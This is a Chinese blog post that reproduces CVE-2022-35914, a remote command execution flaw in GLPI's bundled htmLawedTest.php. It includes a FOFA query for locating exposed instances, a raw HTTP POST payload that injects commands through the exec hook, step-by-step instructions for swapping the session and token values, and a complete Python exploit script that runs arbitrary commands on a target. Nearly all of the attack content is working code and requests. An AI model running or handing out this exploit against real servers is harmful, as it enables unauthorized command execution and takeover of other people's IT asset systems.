GLPI htmLawedTest.php 远程命令执行漏洞（CVE-2022-35914）复现+深度利用（详细图文）

m0_在京菜菜子

已于 2022-10-09 16:51:00 修改

阅读量2.4k

点赞数 2

分类专栏：漏洞复现文章标签： web安全服务器网络安全

于 2022-10-09 16:47:14 首次发布

本文链接：https://blog.csdn.net/m0_60884805/article/details/127229502

版权

漏洞复现专栏收录该内容

4 篇文章 2 订阅

订阅专栏

漏洞描述

GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口，你可以用它来建立数据库全面管理IT的电脑，显示器，服务器，打印机，网络设备，电话，甚至硒鼓和墨盒等。GLPI10.0.2及之前版本存在安全漏洞，该漏洞源于htmlawed模块中的/vendor/htmlawed/htmlawed/htmLawedTest.php允许PHP代码注入。

漏洞环境搭建

fofa：title="GLPI - 登陆入口"

漏洞复现

1.执行POC获取token和sid

将所抓数据包进行修改

正常包发送结果如下

修改包内容。需要修改post上传方式、url、包体内容添加poc

执行将会返回sid值、token值，

poc如下

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88
token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=exec&sid=d531j7fek8t6v3d0d0jpk558q5

执行成功结果

查看返回包内容，找到set-cookie字段和token的value值

Set-Cookie: sid=1dhu5s5645buh3utm6qtin81l1

" id="token" value="4eec6a9d3bdc0d04e37c5ca6e7ad2e99"

将返回包中的sid值放在cookie头和body的token参数中替换，将返回包中的token的value值在POST数据包体的token参数中替换，exec为执行id命令，即可得到回显。

换cookie：

换token：

成功获取结果

脚本版+深度利用拿权限

poc地址

GitHub - cosad3s/CVE-2022-35914-poc

#!/usr/bin/python
# -*- coding: utf-8 -*-

import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re

requests.packages.urllib3.disable_warnings() 

RED = '\x1b[91m'
BLUE = '\033[94m'
GREEN = '\033[32m'
ENDC = '\033[0m'

banner="""  
  ______     _______     ____   ___ ____  ____      _________  ___  _ _  _   
 / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ / ___|/ _ \/ | || |  
| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_ 
| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__   _|
 \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/____/  /_/|_|  |_|  
"""

def main():
    print(banner)
    parser = argparse.ArgumentParser(description='CVE-2022-35914 - GLPI - Command injection using a third-party library script')
    parser.add_argument('-u', type=str, required=True, dest='url', help = "URL to test")
    parser.add_argument('-c', type=str, required=False, dest='cmd', default = "id", help = "Command to launch (default: id)")
    parser.add_argument('-f', type=str, required=False, dest='hook', default = "exec", help = "PHP hook function (default: exec)")
    parser.add_argument('--check', action="store_true", dest='check', help = "Just check, no command execution.")
    parser.add_argument('--user-agent', type=str, required=False, default="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", dest='user_agent', help = "Custom User-Agent")
    args = parser.parse_args()
    exploit(args.url, args.cmd, args.user_agent,args.check,args.hook)

def exploit(url,cmd,user_agent,check,hook):
    uri = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
    headers = {'User-Agent': user_agent}

    session = requests.Session()
    response_part1 = session.get(str(url)+uri, verify=False, headers=headers)
    if (response_part1.status_code != 200):
        fail()
    
    soup = BeautifulSoup(response_part1.text, 'html.parser')
    if (soup.title.text.find("htmLawed") == -1):
        fail()

    if (check):
        print(GREEN + "[+] Server potentially vulnerable to CVE-2022-35914" + ENDC)
        sys.exit()

    # Prepare POST request
    token_value = soup.find_all(id='token')[0]['value']
    sid_value = session.cookies.get("sid")
    body = {"token":token_value,"text":cmd,"hhook":hook,"sid":sid_value}
    response_part2 = session.post(str(url)+uri, verify=False, headers=headers, data=body)
    parse(response_part2.text)

def parse(response):
    soup = BeautifulSoup(response, 'html.parser')
    raw = soup.find_all(id='settingF')[0]

    return_code_search_regex = "\$spec\: (.*)"
    found_return_code = re.search(return_code_search_regex, raw.text, re.DOTALL).group(1)

    output_search_regex = "\[xml:lang\] \=\> 0\n(.*)\n\)"
    found_output = re.search(output_search_regex, raw.text, re.DOTALL)
    print(GREEN + "[+] Command output (Return code: " + found_return_code + "):" + ENDC)
    if (found_output != None):
        raw_output = found_output.group(1)
        cleaning_regex = ".*\=\>"
        cleaned_output = re.sub (cleaning_regex, "", raw_output)
        print(cleaned_output)

def fail():
    print(RED + "[-] Server not vulnerable to CVE-2022-35914" + ENDC)
    sys.exit()

if __name__ == '__main__':
    main()

执行脚本文件进行攻击